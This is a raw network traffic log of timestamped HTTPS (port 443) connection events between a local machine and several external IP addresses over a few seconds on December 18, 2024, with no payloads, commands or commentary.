                                              Dec 18, 2024 23:41:52.431849003 CET44349765104.18.94.41192.168.2.4
                                              Dec 18, 2024 23:41:52.431927919 CET49765443192.168.2.4104.18.94.41
                                              Dec 18, 2024 23:41:52.435797930 CET44349765104.18.94.41192.168.2.4
                                              Dec 18, 2024 23:41:52.435869932 CET49765443192.168.2.4104.18.94.41
                                              Dec 18, 2024 23:41:52.445661068 CET44349765104.18.94.41192.168.2.4
                                              Dec 18, 2024 23:41:52.445723057 CET49765443192.168.2.4104.18.94.41
                                              Dec 18, 2024 23:41:52.449799061 CET44349765104.18.94.41192.168.2.4
                                              Dec 18, 2024 23:41:52.449870110 CET49765443192.168.2.4104.18.94.41
                                              Dec 18, 2024 23:41:52.457587004 CET44349765104.18.94.41192.168.2.4
                                              Dec 18, 2024 23:41:52.457652092 CET49765443192.168.2.4104.18.94.41
                                              Dec 18, 2024 23:41:52.537487030 CET44349765104.18.94.41192.168.2.4
                                              Dec 18, 2024 23:41:52.537579060 CET49765443192.168.2.4104.18.94.41
                                              Dec 18, 2024 23:41:52.537585020 CET44349765104.18.94.41192.168.2.4
                                              Dec 18, 2024 23:41:52.537643909 CET49765443192.168.2.4104.18.94.41
                                              Dec 18, 2024 23:41:52.537731886 CET49765443192.168.2.4104.18.94.41
                                              Dec 18, 2024 23:41:52.537770033 CET44349765104.18.94.41192.168.2.4
                                              Dec 18, 2024 23:41:52.540391922 CET49768443192.168.2.4104.18.95.41
                                              Dec 18, 2024 23:41:52.540477037 CET44349768104.18.95.41192.168.2.4
                                              Dec 18, 2024 23:41:52.540597916 CET49768443192.168.2.4104.18.95.41
                                              Dec 18, 2024 23:41:52.540806055 CET49768443192.168.2.4104.18.95.41
                                              Dec 18, 2024 23:41:52.540843010 CET44349768104.18.95.41192.168.2.4
                                              Dec 18, 2024 23:41:52.558336973 CET49753443192.168.2.4172.67.166.86
                                              Dec 18, 2024 23:41:52.599385977 CET44349753172.67.166.86192.168.2.4
                                              Dec 18, 2024 23:41:52.687335968 CET49769443192.168.2.4104.18.94.41
                                              Dec 18, 2024 23:41:52.687388897 CET44349769104.18.94.41192.168.2.4
                                              Dec 18, 2024 23:41:52.687475920 CET49769443192.168.2.4104.18.94.41
                                              Dec 18, 2024 23:41:52.687868118 CET49769443192.168.2.4104.18.94.41
                                              Dec 18, 2024 23:41:52.687911987 CET44349769104.18.94.41192.168.2.4
                                              Dec 18, 2024 23:41:52.893953085 CET44349753172.67.166.86192.168.2.4
                                              Dec 18, 2024 23:41:52.894033909 CET44349753172.67.166.86192.168.2.4
                                              Dec 18, 2024 23:41:52.894102097 CET49753443192.168.2.4172.67.166.86
                                              Dec 18, 2024 23:41:52.896029949 CET49753443192.168.2.4172.67.166.86
                                              Dec 18, 2024 23:41:52.896058083 CET44349753172.67.166.86192.168.2.4
                                              Dec 18, 2024 23:41:53.036082029 CET49770443192.168.2.435.190.80.1
                                              Dec 18, 2024 23:41:53.036159992 CET4434977035.190.80.1192.168.2.4
                                              Dec 18, 2024 23:41:53.036238909 CET49770443192.168.2.435.190.80.1
                                              Dec 18, 2024 23:41:53.036469936 CET49770443192.168.2.435.190.80.1
                                              Dec 18, 2024 23:41:53.036494970 CET4434977035.190.80.1192.168.2.4
                                              Dec 18, 2024 23:41:53.459630966 CET44349767104.18.95.41192.168.2.4
                                              Dec 18, 2024 23:41:53.459968090 CET49767443192.168.2.4104.18.95.41
                                              Dec 18, 2024 23:41:53.459999084 CET44349767104.18.95.41192.168.2.4
                                              Dec 18, 2024 23:41:53.460458994 CET44349767104.18.95.41192.168.2.4
                                              Dec 18, 2024 23:41:53.460855007 CET49767443192.168.2.4104.18.95.41
                                              Dec 18, 2024 23:41:53.460941076 CET44349767104.18.95.41192.168.2.4
                                              Dec 18, 2024 23:41:53.461005926 CET49767443192.168.2.4104.18.95.41
                                              Dec 18, 2024 23:41:53.503380060 CET44349767104.18.95.41192.168.2.4
                                              Dec 18, 2024 23:41:53.750045061 CET44349768104.18.95.41192.168.2.4
                                              Dec 18, 2024 23:41:53.750921011 CET49768443192.168.2.4104.18.95.41
                                              Dec 18, 2024 23:41:53.751019955 CET44349768104.18.95.41192.168.2.4
                                              Dec 18, 2024 23:41:53.752528906 CET44349768104.18.95.41192.168.2.4
                                              Dec 18, 2024 23:41:53.803708076 CET49768443192.168.2.4104.18.95.41
                                              Dec 18, 2024 23:41:53.805453062 CET49768443192.168.2.4104.18.95.41
                                              Dec 18, 2024 23:41:53.805764914 CET49768443192.168.2.4104.18.95.41
                                              Dec 18, 2024 23:41:53.805927038 CET44349768104.18.95.41192.168.2.4
                                              Dec 18, 2024 23:41:53.851747036 CET49768443192.168.2.4104.18.95.41
                                              Dec 18, 2024 23:41:53.903712034 CET44349767104.18.95.41192.168.2.4
                                              Dec 18, 2024 23:41:53.904488087 CET44349767104.18.95.41192.168.2.4
                                              Dec 18, 2024 23:41:53.904566050 CET49767443192.168.2.4104.18.95.41
                                              Dec 18, 2024 23:41:53.921983957 CET44349769104.18.94.41192.168.2.4
                                              Dec 18, 2024 23:41:53.926839113 CET49769443192.168.2.4104.18.94.41
                                              Dec 18, 2024 23:41:53.926899910 CET44349769104.18.94.41192.168.2.4
                                              Dec 18, 2024 23:41:53.927649975 CET44349769104.18.94.41192.168.2.4
                                              Dec 18, 2024 23:41:53.939945936 CET49769443192.168.2.4104.18.94.41
                                              Dec 18, 2024 23:41:53.940038919 CET49769443192.168.2.4104.18.94.41
                                              Dec 18, 2024 23:41:53.940038919 CET49769443192.168.2.4104.18.94.41
                                              Dec 18, 2024 23:41:53.940073967 CET44349769104.18.94.41192.168.2.4
                                              Dec 18, 2024 23:41:53.940237999 CET44349769104.18.94.41192.168.2.4
                                              Dec 18, 2024 23:41:53.940481901 CET44349769104.18.94.41192.168.2.4
                                              Dec 18, 2024 23:41:53.950134039 CET49767443192.168.2.4104.18.95.41
                                              Dec 18, 2024 23:41:53.950228930 CET44349767104.18.95.41192.168.2.4
                                              Dec 18, 2024 23:41:53.995310068 CET49769443192.168.2.4104.18.94.41
                                              Dec 18, 2024 23:41:54.265160084 CET4434977035.190.80.1192.168.2.4
                                              Dec 18, 2024 23:41:54.265434980 CET49770443192.168.2.435.190.80.1
                                              Dec 18, 2024 23:41:54.265491009 CET4434977035.190.80.1192.168.2.4
                                              Dec 18, 2024 23:41:54.266936064 CET4434977035.190.80.1192.168.2.4
                                              Dec 18, 2024 23:41:54.267008066 CET49770443192.168.2.435.190.80.1
                                              Dec 18, 2024 23:41:54.268126965 CET49770443192.168.2.435.190.80.1
                                              Dec 18, 2024 23:41:54.268215895 CET4434977035.190.80.1192.168.2.4
                                              Dec 18, 2024 23:41:54.268290043 CET49770443192.168.2.435.190.80.1
                                              Dec 18, 2024 23:41:54.268305063 CET4434977035.190.80.1192.168.2.4
                                              Dec 18, 2024 23:41:54.320524931 CET49770443192.168.2.435.190.80.1
                                              Dec 18, 2024 23:41:55.322562933 CET44349768104.18.95.41192.168.2.4
                                              Dec 18, 2024 23:41:55.322691917 CET44349768104.18.95.41192.168.2.4
                                              Dec 18, 2024 23:41:55.322777987 CET49768443192.168.2.4104.18.95.41
                                              Dec 18, 2024 23:41:55.322784901 CET44349768104.18.95.41192.168.2.4
                                              Dec 18, 2024 23:41:55.322843075 CET44349768104.18.95.41192.168.2.4
                                              Dec 18, 2024 23:41:55.322909117 CET49768443192.168.2.4104.18.95.41
                                              Dec 18, 2024 23:41:55.322925091 CET44349768104.18.95.41192.168.2.4
                                              Dec 18, 2024 23:41:55.323009014 CET44349768104.18.95.41192.168.2.4
                                              Dec 18, 2024 23:41:55.323060036 CET49768443192.168.2.4104.18.95.41
                                              Dec 18, 2024 23:41:55.323071957 CET44349768104.18.95.41192.168.2.4
                                              Dec 18, 2024 23:41:55.323180914 CET44349768104.18.95.41192.168.2.4
                                              Dec 18, 2024 23:41:55.323235989 CET49768443192.168.2.4104.18.95.41
                                              Dec 18, 2024 23:41:55.323246956 CET44349768104.18.95.41192.168.2.4
                                              Dec 18, 2024 23:41:55.323354006 CET44349768104.18.95.41192.168.2.4
                                              Dec 18, 2024 23:41:55.323415041 CET49768443192.168.2.4104.18.95.41
                                              Dec 18, 2024 23:41:55.323426962 CET44349768104.18.95.41192.168.2.4
                                              Dec 18, 2024 23:41:55.377573967 CET49768443192.168.2.4104.18.95.41
                                              Dec 18, 2024 23:41:55.506074905 CET44349768104.18.95.41192.168.2.4
                                              Dec 18, 2024 23:41:55.547389030 CET49768443192.168.2.4104.18.95.41
                                              Dec 18, 2024 23:41:55.561883926 CET44349768104.18.95.41192.168.2.4
                                              Dec 18, 2024 23:41:55.570127010 CET44349768104.18.95.41192.168.2.4
                                              Dec 18, 2024 23:41:55.570370913 CET49768443192.168.2.4104.18.95.41
                                              Dec 18, 2024 23:41:55.570461988 CET44349768104.18.95.41192.168.2.4
                                              Dec 18, 2024 23:41:55.578735113 CET44349768104.18.95.41192.168.2.4
                                              Dec 18, 2024 23:41:55.578824997 CET49768443192.168.2.4104.18.95.41
                                              Dec 18, 2024 23:41:55.578886986 CET44349768104.18.95.41192.168.2.4
                                              Dec 18, 2024 23:41:55.587174892 CET44349768104.18.95.41192.168.2.4
                                              Dec 18, 2024 23:41:55.587395906 CET49768443192.168.2.4104.18.95.41
                                              Dec 18, 2024 23:41:55.587455988 CET44349768104.18.95.41192.168.2.4
                                              Dec 18, 2024 23:41:55.595366001 CET44349768104.18.95.41192.168.2.4
                                              Dec 18, 2024 23:41:55.595601082 CET49768443192.168.2.4104.18.95.41
                                              Dec 18, 2024 23:41:55.595662117 CET44349768104.18.95.41192.168.2.4
                                              Dec 18, 2024 23:41:55.612009048 CET44349768104.18.95.41192.168.2.4
                                              Dec 18, 2024 23:41:55.612123966 CET44349768104.18.95.41192.168.2.4
                                              Dec 18, 2024 23:41:55.612128019 CET49768443192.168.2.4104.18.95.41
                                              Dec 18, 2024 23:41:55.612189054 CET44349768104.18.95.41192.168.2.4
                                              Dec 18, 2024 23:41:55.612262011 CET49768443192.168.2.4104.18.95.41
                                              Dec 18, 2024 23:41:55.620444059 CET44349768104.18.95.41192.168.2.4
                                              Dec 18, 2024 23:41:55.628967047 CET44349768104.18.95.41192.168.2.4
                                              Dec 18, 2024 23:41:55.629070997 CET44349768104.18.95.41192.168.2.4
                                              Dec 18, 2024 23:41:55.629158020 CET49768443192.168.2.4104.18.95.41
                                              Dec 18, 2024 23:41:55.629219055 CET44349768104.18.95.41192.168.2.4
                                              Dec 18, 2024 23:41:55.629281044 CET49768443192.168.2.4104.18.95.41
                                              Dec 18, 2024 23:41:55.637286901 CET44349768104.18.95.41192.168.2.4
                                              Dec 18, 2024 23:41:55.645829916 CET44349768104.18.95.41192.168.2.4
                                              Dec 18, 2024 23:41:55.645927906 CET49768443192.168.2.4104.18.95.41
                                              Dec 18, 2024 23:41:55.645987034 CET44349768104.18.95.41192.168.2.4
                                              Dec 18, 2024 23:41:55.681798935 CET44349768104.18.95.41192.168.2.4
                                              Dec 18, 2024 23:41:55.681880951 CET49768443192.168.2.4104.18.95.41
                                              Dec 18, 2024 23:41:55.681941986 CET44349768104.18.95.41192.168.2.4
                                              Dec 18, 2024 23:41:55.689625978 CET44349768104.18.95.41192.168.2.4
                                              Dec 18, 2024 23:41:55.689707041 CET49768443192.168.2.4104.18.95.41
                                              Dec 18, 2024 23:41:55.689723015 CET44349768104.18.95.41192.168.2.4
                                              Dec 18, 2024 23:41:55.698424101 CET44349768104.18.95.41192.168.2.4
                                              Dec 18, 2024 23:41:55.698501110 CET49768443192.168.2.4104.18.95.41
                                              Dec 18, 2024 23:41:55.698513985 CET44349768104.18.95.41192.168.2.4
                                              Dec 18, 2024 23:41:55.715553999 CET44349768104.18.95.41192.168.2.4
                                              Dec 18, 2024 23:41:55.715661049 CET44349768104.18.95.41192.168.2.4
                                              Dec 18, 2024 23:41:55.715748072 CET49768443192.168.2.4104.18.95.41
                                              Dec 18, 2024 23:41:55.715810061 CET44349768104.18.95.41192.168.2.4
                                              Dec 18, 2024 23:41:55.715867996 CET49768443192.168.2.4104.18.95.41
                                              Dec 18, 2024 23:41:55.787596941 CET44349768104.18.95.41192.168.2.4
                                              Dec 18, 2024 23:41:55.791055918 CET4434977035.190.80.1192.168.2.4
                                              Dec 18, 2024 23:41:55.791243076 CET4434977035.190.80.1192.168.2.4
                                              Dec 18, 2024 23:41:55.791353941 CET49770443192.168.2.435.190.80.1
                                              Dec 18, 2024 23:41:55.791353941 CET49770443192.168.2.435.190.80.1
                                              Dec 18, 2024 23:41:55.791436911 CET49770443192.168.2.435.190.80.1
                                              Dec 18, 2024 23:41:55.792191029 CET49771443192.168.2.435.190.80.1
                                              Dec 18, 2024 23:41:55.792256117 CET4434977135.190.80.1192.168.2.4
                                              Dec 18, 2024 23:41:55.792336941 CET49771443192.168.2.435.190.80.1
                                              Dec 18, 2024 23:41:55.792587996 CET49771443192.168.2.435.190.80.1
                                              Dec 18, 2024 23:41:55.792608976 CET4434977135.190.80.1192.168.2.4
                                              Dec 18, 2024 23:41:55.797702074 CET44349768104.18.95.41192.168.2.4
                                              Dec 18, 2024 23:41:55.797734022 CET44349768104.18.95.41192.168.2.4
                                              Dec 18, 2024 23:41:55.797785997 CET49768443192.168.2.4104.18.95.41
                                              Dec 18, 2024 23:41:55.797854900 CET44349768104.18.95.41192.168.2.4
                                              Dec 18, 2024 23:41:55.797890902 CET49768443192.168.2.4104.18.95.41
                                              Dec 18, 2024 23:41:55.811367989 CET44349768104.18.95.41192.168.2.4
                                              Dec 18, 2024 23:41:55.811623096 CET49768443192.168.2.4104.18.95.41
                                              Dec 18, 2024 23:41:55.811682940 CET44349768104.18.95.41192.168.2.4
                                              Dec 18, 2024 23:41:55.811762094 CET49768443192.168.2.4104.18.95.41
                                              Dec 18, 2024 23:41:55.816101074 CET44349768104.18.95.41192.168.2.4
                                              Dec 18, 2024 23:41:55.819520950 CET44349768104.18.95.41192.168.2.4
                                              Dec 18, 2024 23:41:55.819614887 CET49768443192.168.2.4104.18.95.41
                                              Dec 18, 2024 23:41:55.819675922 CET44349768104.18.95.41192.168.2.4
                                              Dec 18, 2024 23:41:55.819746971 CET49768443192.168.2.4104.18.95.41
                                              Dec 18, 2024 23:41:55.827281952 CET44349768104.18.95.41192.168.2.4
                                              Dec 18, 2024 23:41:55.827342033 CET44349768104.18.95.41192.168.2.4
                                              Dec 18, 2024 23:41:55.827425003 CET49768443192.168.2.4104.18.95.41
                                              Dec 18, 2024 23:41:55.834527016 CET44349768104.18.95.41192.168.2.4
                                              Dec 18, 2024 23:41:55.834779978 CET49768443192.168.2.4104.18.95.41
                                              Dec 18, 2024 23:41:55.834839106 CET44349768104.18.95.41192.168.2.4
                                              Dec 18, 2024 23:41:55.834906101 CET49768443192.168.2.4104.18.95.41
                                              Dec 18, 2024 23:41:55.841589928 CET44349768104.18.95.41192.168.2.4
                                              Dec 18, 2024 23:41:55.841687918 CET49768443192.168.2.4104.18.95.41
                                              Dec 18, 2024 23:41:55.842694998 CET44349769104.18.94.41192.168.2.4
                                              Dec 18, 2024 23:41:55.842864990 CET44349769104.18.94.41192.168.2.4
                                              Dec 18, 2024 23:41:55.842940092 CET49769443192.168.2.4104.18.94.41
                                              Dec 18, 2024 23:41:55.842952967 CET44349769104.18.94.41192.168.2.4
                                              Dec 18, 2024 23:41:55.843004942 CET44349769104.18.94.41192.168.2.4
                                              Dec 18, 2024 23:41:55.843065023 CET49769443192.168.2.4104.18.94.41
                                              Dec 18, 2024 23:41:55.845067024 CET44349768104.18.95.41192.168.2.4
                                              Dec 18, 2024 23:41:55.845187902 CET49768443192.168.2.4104.18.95.41
                                              Dec 18, 2024 23:41:55.850617886 CET44349769104.18.94.41192.168.2.4
                                              Dec 18, 2024 23:41:55.852566957 CET44349768104.18.95.41192.168.2.4
                                              Dec 18, 2024 23:41:55.852839947 CET49768443192.168.2.4104.18.95.41
                                              Dec 18, 2024 23:41:55.859139919 CET44349769104.18.94.41192.168.2.4
                                              Dec 18, 2024 23:41:55.859225988 CET49769443192.168.2.4104.18.94.41
                                              Dec 18, 2024 23:41:55.859253883 CET44349769104.18.94.41192.168.2.4
                                              Dec 18, 2024 23:41:55.859304905 CET44349769104.18.94.41192.168.2.4
                                              Dec 18, 2024 23:41:55.859360933 CET49769443192.168.2.4104.18.94.41
                                              Dec 18, 2024 23:41:55.859622002 CET44349768104.18.95.41192.168.2.4
                                              Dec 18, 2024 23:41:55.859711885 CET49768443192.168.2.4104.18.95.41
                                              Dec 18, 2024 23:41:55.867930889 CET44349769104.18.94.41192.168.2.4
                                              Dec 18, 2024 23:41:55.876229048 CET44349769104.18.94.41192.168.2.4
                                              Dec 18, 2024 23:41:55.876308918 CET49769443192.168.2.4104.18.94.41
                                              Dec 18, 2024 23:41:55.876383066 CET44349769104.18.94.41192.168.2.4
                                              Dec 18, 2024 23:41:55.909080982 CET44349768104.18.95.41192.168.2.4
                                              Dec 18, 2024 23:41:55.909333944 CET49768443192.168.2.4104.18.95.41
                                              Dec 18, 2024 23:41:55.910906076 CET44349768104.18.95.41192.168.2.4
                                              Dec 18, 2024 23:41:55.911129951 CET49768443192.168.2.4104.18.95.41
                                              Dec 18, 2024 23:41:55.918050051 CET44349768104.18.95.41192.168.2.4
                                              Dec 18, 2024 23:41:55.918152094 CET49768443192.168.2.4104.18.95.41
                                              Dec 18, 2024 23:41:55.926604033 CET44349768104.18.95.41192.168.2.4
                                              Dec 18, 2024 23:41:55.926701069 CET49768443192.168.2.4104.18.95.41
                                              Dec 18, 2024 23:41:55.927299976 CET49769443192.168.2.4104.18.94.41
                                              Dec 18, 2024 23:41:55.931847095 CET44349768104.18.95.41192.168.2.4
                                              Dec 18, 2024 23:41:55.932076931 CET49768443192.168.2.4104.18.95.41
                                              Dec 18, 2024 23:41:55.935168028 CET44349768104.18.95.41192.168.2.4
                                              Dec 18, 2024 23:41:55.935373068 CET44349768104.18.95.41192.168.2.4
                                              Dec 18, 2024 23:41:55.935414076 CET49768443192.168.2.4104.18.95.41
                                              Dec 18, 2024 23:41:55.935414076 CET49768443192.168.2.4104.18.95.41
                                              Dec 18, 2024 23:41:55.935489893 CET44349768104.18.95.41192.168.2.4
                                              Dec 18, 2024 23:41:55.935523987 CET49768443192.168.2.4104.18.95.41
                                              Dec 18, 2024 23:41:55.935578108 CET49768443192.168.2.4104.18.95.41
                                              Dec 18, 2024 23:41:55.962419987 CET44349769104.18.94.41192.168.2.4
                                              Dec 18, 2024 23:41:56.003356934 CET49769443192.168.2.4104.18.94.41
                                              Dec 18, 2024 23:41:56.003386974 CET44349769104.18.94.41192.168.2.4
                                              Dec 18, 2024 23:41:56.038858891 CET44349769104.18.94.41192.168.2.4
                                              Dec 18, 2024 23:41:56.039000034 CET44349769104.18.94.41192.168.2.4
                                              Dec 18, 2024 23:41:56.039058924 CET49769443192.168.2.4104.18.94.41
                                              Dec 18, 2024 23:41:56.039123058 CET44349769104.18.94.41192.168.2.4
                                              Dec 18, 2024 23:41:56.039191008 CET49769443192.168.2.4104.18.94.41
                                              Dec 18, 2024 23:41:56.047350883 CET44349769104.18.94.41192.168.2.4
                                              Dec 18, 2024 23:41:56.050791025 CET44349769104.18.94.41192.168.2.4
                                              Dec 18, 2024 23:41:56.050875902 CET49769443192.168.2.4104.18.94.41
                                              Dec 18, 2024 23:41:56.050937891 CET44349769104.18.94.41192.168.2.4
                                              Dec 18, 2024 23:41:56.067365885 CET44349769104.18.94.41192.168.2.4
                                              Dec 18, 2024 23:41:56.067585945 CET49769443192.168.2.4104.18.94.41
                                              Dec 18, 2024 23:41:56.067605019 CET44349769104.18.94.41192.168.2.4
                                              Dec 18, 2024 23:41:56.067636013 CET44349769104.18.94.41192.168.2.4
                                              Dec 18, 2024 23:41:56.067689896 CET49769443192.168.2.4104.18.94.41
                                              Dec 18, 2024 23:41:56.075623035 CET44349769104.18.94.41192.168.2.4
                                              Dec 18, 2024 23:41:56.084209919 CET44349769104.18.94.41192.168.2.4
                                              Dec 18, 2024 23:41:56.084328890 CET49769443192.168.2.4104.18.94.41
                                              Dec 18, 2024 23:41:56.084388971 CET44349769104.18.94.41192.168.2.4
                                              Dec 18, 2024 23:41:56.092365026 CET44349769104.18.94.41192.168.2.4
                                              Dec 18, 2024 23:41:56.092551947 CET49769443192.168.2.4104.18.94.41
                                              Dec 18, 2024 23:41:56.092612982 CET44349769104.18.94.41192.168.2.4
                                              Dec 18, 2024 23:41:56.101139069 CET44349769104.18.94.41192.168.2.4
                                              Dec 18, 2024 23:41:56.101349115 CET49769443192.168.2.4104.18.94.41
                                              Dec 18, 2024 23:41:56.101411104 CET44349769104.18.94.41192.168.2.4
                                              Dec 18, 2024 23:41:56.107398033 CET44349769104.18.94.41192.168.2.4
                                              Dec 18, 2024 23:41:56.107502937 CET49769443192.168.2.4104.18.94.41
                                              Dec 18, 2024 23:41:56.107563972 CET44349769104.18.94.41192.168.2.4
                                              Dec 18, 2024 23:41:56.112936020 CET44349769104.18.94.41192.168.2.4
                                              Dec 18, 2024 23:41:56.113023043 CET49769443192.168.2.4104.18.94.41
                                              Dec 18, 2024 23:41:56.113084078 CET44349769104.18.94.41192.168.2.4
                                              Dec 18, 2024 23:41:56.119501114 CET44349769104.18.94.41192.168.2.4
                                              Dec 18, 2024 23:41:56.119604111 CET49769443192.168.2.4104.18.94.41
                                              Dec 18, 2024 23:41:56.119666100 CET44349769104.18.94.41192.168.2.4
                                              Dec 18, 2024 23:41:56.162094116 CET49769443192.168.2.4104.18.94.41
                                              Dec 18, 2024 23:41:56.227253914 CET44349769104.18.94.41192.168.2.4
                                              Dec 18, 2024 23:41:56.230017900 CET44349769104.18.94.41192.168.2.4
                                              Dec 18, 2024 23:41:56.230281115 CET49769443192.168.2.4104.18.94.41
                                              Dec 18, 2024 23:41:56.230372906 CET44349769104.18.94.41192.168.2.4
                                              Dec 18, 2024 23:41:56.235280037 CET44349769104.18.94.41192.168.2.4
                                              Dec 18, 2024 23:41:56.235358953 CET49769443192.168.2.4104.18.94.41
                                              Dec 18, 2024 23:41:56.235419989 CET44349769104.18.94.41192.168.2.4
                                              Dec 18, 2024 23:41:56.241451025 CET44349769104.18.94.41192.168.2.4
                                              Dec 18, 2024 23:41:56.241545916 CET49769443192.168.2.4104.18.94.41
                                              Dec 18, 2024 23:41:56.241606951 CET44349769104.18.94.41192.168.2.4
                                              Dec 18, 2024 23:41:56.249895096 CET44349769104.18.94.41192.168.2.4
                                              Dec 18, 2024 23:41:56.250046968 CET49769443192.168.2.4104.18.94.41
                                              Dec 18, 2024 23:41:56.250107050 CET44349769104.18.94.41192.168.2.4
                                              Dec 18, 2024 23:41:56.250169992 CET49769443192.168.2.4104.18.94.41
                                              Dec 18, 2024 23:41:56.258150101 CET44349769104.18.94.41192.168.2.4
                                              Dec 18, 2024 23:41:56.258182049 CET44349769104.18.94.41192.168.2.4
                                              Dec 18, 2024 23:41:56.258241892 CET49769443192.168.2.4104.18.94.41
                                              Dec 18, 2024 23:41:56.267088890 CET44349769104.18.94.41192.168.2.4
                                              Dec 18, 2024 23:41:56.267123938 CET44349769104.18.94.41192.168.2.4
                                              Dec 18, 2024 23:41:56.267208099 CET49769443192.168.2.4104.18.94.41
                                              Dec 18, 2024 23:41:56.267208099 CET49769443192.168.2.4104.18.94.41
                                              Dec 18, 2024 23:41:56.267271996 CET44349769104.18.94.41192.168.2.4
                                              Dec 18, 2024 23:41:56.275995016 CET44349769104.18.94.41192.168.2.4
                                              Dec 18, 2024 23:41:56.276094913 CET49769443192.168.2.4104.18.94.41
                                              Dec 18, 2024 23:41:56.276154041 CET44349769104.18.94.41192.168.2.4
                                              Dec 18, 2024 23:41:56.276210070 CET49769443192.168.2.4104.18.94.41
                                              Dec 18, 2024 23:41:56.281048059 CET44349769104.18.94.41192.168.2.4
                                              Dec 18, 2024 23:41:56.281078100 CET44349769104.18.94.41192.168.2.4
                                              Dec 18, 2024 23:41:56.281155109 CET49769443192.168.2.4104.18.94.41
                                              Dec 18, 2024 23:41:56.289114952 CET44349769104.18.94.41192.168.2.4
                                              Dec 18, 2024 23:41:56.289208889 CET49769443192.168.2.4104.18.94.41
                                              Dec 18, 2024 23:41:56.289269924 CET44349769104.18.94.41192.168.2.4
                                              Dec 18, 2024 23:41:56.289328098 CET49769443192.168.2.4104.18.94.41
                                              Dec 18, 2024 23:41:56.297804117 CET44349769104.18.94.41192.168.2.4
                                              Dec 18, 2024 23:41:56.297931910 CET49769443192.168.2.4104.18.94.41
                                              Dec 18, 2024 23:41:56.306509018 CET44349769104.18.94.41192.168.2.4
                                              Dec 18, 2024 23:41:56.306607962 CET49769443192.168.2.4104.18.94.41
                                              Dec 18, 2024 23:41:56.311067104 CET44349769104.18.94.41192.168.2.4
                                              Dec 18, 2024 23:41:56.311163902 CET49769443192.168.2.4104.18.94.41
                                              Dec 18, 2024 23:41:56.420456886 CET44349769104.18.94.41192.168.2.4
                                              Dec 18, 2024 23:41:56.420746088 CET49769443192.168.2.4104.18.94.41
                                              Dec 18, 2024 23:41:56.425335884 CET44349769104.18.94.41192.168.2.4
                                              Dec 18, 2024 23:41:56.425434113 CET49769443192.168.2.4104.18.94.41
                                              Dec 18, 2024 23:41:56.431672096 CET44349769104.18.94.41192.168.2.4
                                              Dec 18, 2024 23:41:56.431770086 CET49769443192.168.2.4104.18.94.41
                                              Dec 18, 2024 23:41:56.438635111 CET44349769104.18.94.41192.168.2.4
                                              Dec 18, 2024 23:41:56.438724995 CET49769443192.168.2.4104.18.94.41
                                              Dec 18, 2024 23:41:56.442167044 CET44349769104.18.94.41192.168.2.4
                                              Dec 18, 2024 23:41:56.442357063 CET49769443192.168.2.4104.18.94.41
                                              Dec 18, 2024 23:41:56.448734999 CET44349769104.18.94.41192.168.2.4
                                              Dec 18, 2024 23:41:56.448832035 CET49769443192.168.2.4104.18.94.41
                                              Dec 18, 2024 23:41:56.455009937 CET44349769104.18.94.41192.168.2.4
                                              Dec 18, 2024 23:41:56.455164909 CET49769443192.168.2.4104.18.94.41
                                              Dec 18, 2024 23:41:56.461177111 CET44349769104.18.94.41192.168.2.4
                                              Dec 18, 2024 23:41:56.461280107 CET49769443192.168.2.4104.18.94.41
                                              Dec 18, 2024 23:41:56.464297056 CET44349769104.18.94.41192.168.2.4
                                              Dec 18, 2024 23:41:56.464560986 CET49769443192.168.2.4104.18.94.41
                                              Dec 18, 2024 23:41:56.470925093 CET44349769104.18.94.41192.168.2.4
                                              Dec 18, 2024 23:41:56.471034050 CET49769443192.168.2.4104.18.94.41
                                              Dec 18, 2024 23:41:56.475425005 CET44349769104.18.94.41192.168.2.4
                                              Dec 18, 2024 23:41:56.475702047 CET49769443192.168.2.4104.18.94.41
                                              Dec 18, 2024 23:41:56.481092930 CET44349769104.18.94.41192.168.2.4
                                              Dec 18, 2024 23:41:56.481229067 CET49769443192.168.2.4104.18.94.41
                                              Dec 18, 2024 23:41:56.487504005 CET44349769104.18.94.41192.168.2.4
                                              Dec 18, 2024 23:41:56.487584114 CET49769443192.168.2.4104.18.94.41
                                              Dec 18, 2024 23:41:56.490406036 CET44349769104.18.94.41192.168.2.4
                                              Dec 18, 2024 23:41:56.490485907 CET49769443192.168.2.4104.18.94.41
                                              Dec 18, 2024 23:41:56.490516901 CET44349769104.18.94.41192.168.2.4
                                              Dec 18, 2024 23:41:56.490586042 CET49769443192.168.2.4104.18.94.41
                                              Dec 18, 2024 23:41:56.490586042 CET44349769104.18.94.41192.168.2.4
                                              Dec 18, 2024 23:41:56.490609884 CET49769443192.168.2.4104.18.94.41
                                              Dec 18, 2024 23:41:56.490609884 CET49769443192.168.2.4104.18.94.41
                                              Dec 18, 2024 23:41:56.490628004 CET44349769104.18.94.41192.168.2.4
                                              Dec 18, 2024 23:41:56.490665913 CET49769443192.168.2.4104.18.94.41
                                              Dec 18, 2024 23:41:56.490693092 CET49769443192.168.2.4104.18.94.41
                                              Dec 18, 2024 23:41:56.493242025 CET49772443192.168.2.4104.18.95.41
                                              Dec 18, 2024 23:41:56.493330002 CET44349772104.18.95.41192.168.2.4
                                              Dec 18, 2024 23:41:56.493405104 CET49772443192.168.2.4104.18.95.41
                                              Dec 18, 2024 23:41:56.493644953 CET49772443192.168.2.4104.18.95.41
                                              Dec 18, 2024 23:41:56.493670940 CET44349772104.18.95.41192.168.2.4
                                              Dec 18, 2024 23:41:56.683478117 CET49773443192.168.2.4104.18.94.41
                                              Dec 18, 2024 23:41:56.683521032 CET44349773104.18.94.41192.168.2.4
                                              Dec 18, 2024 23:41:56.683592081 CET49773443192.168.2.4104.18.94.41
                                              Dec 18, 2024 23:41:56.683969021 CET49773443192.168.2.4104.18.94.41
                                              Dec 18, 2024 23:41:56.683986902 CET44349773104.18.94.41192.168.2.4
                                              Dec 18, 2024 23:41:57.005994081 CET4434977135.190.80.1192.168.2.4
                                              Dec 18, 2024 23:41:57.006396055 CET49771443192.168.2.435.190.80.1
                                              Dec 18, 2024 23:41:57.006472111 CET4434977135.190.80.1192.168.2.4
                                              Dec 18, 2024 23:41:57.007884026 CET4434977135.190.80.1192.168.2.4
                                              Dec 18, 2024 23:41:57.008486986 CET49771443192.168.2.435.190.80.1
                                              Dec 18, 2024 23:41:57.008588076 CET49771443192.168.2.435.190.80.1
                                              Dec 18, 2024 23:41:57.008619070 CET4434977135.190.80.1192.168.2.4
                                              Dec 18, 2024 23:41:57.008912086 CET4434977135.190.80.1192.168.2.4
                                              Dec 18, 2024 23:41:57.053184032 CET49771443192.168.2.435.190.80.1
                                              Dec 18, 2024 23:41:57.467726946 CET4434977135.190.80.1192.168.2.4
                                              Dec 18, 2024 23:41:57.467936993 CET4434977135.190.80.1192.168.2.4
